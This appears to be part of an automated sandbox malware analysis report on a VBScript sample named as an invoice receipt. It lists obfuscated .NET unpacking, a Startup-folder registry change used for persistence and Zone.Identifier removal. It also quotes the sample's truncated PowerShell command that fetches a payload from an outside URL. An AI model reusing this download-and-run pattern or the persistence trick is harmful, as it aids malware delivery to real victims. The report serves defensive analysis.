          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{fcfcc300-e950-40f9-b028-e26ea1764ca2}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_01
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\G2M18C6INV0ICERECEIPT.vbs"
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

          Data Obfuscation:

          barindex
          VBScript performs obfuscated calls to suspicious functionsShow sources
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run H17437795812H13815631695+H71315173172H22571292489, 0, TrueIWshShell3.Run("powershell $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'--", "0", "true")
          .NET source code contains potential unpackerShow sources
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA1D5B61CA push edi; ret
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA1D5BBDAA push edx; retf
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA1D5B1D80 pushad ; retf 1D7Dh
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe:Zone.Identifier read attributes | delete
          Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
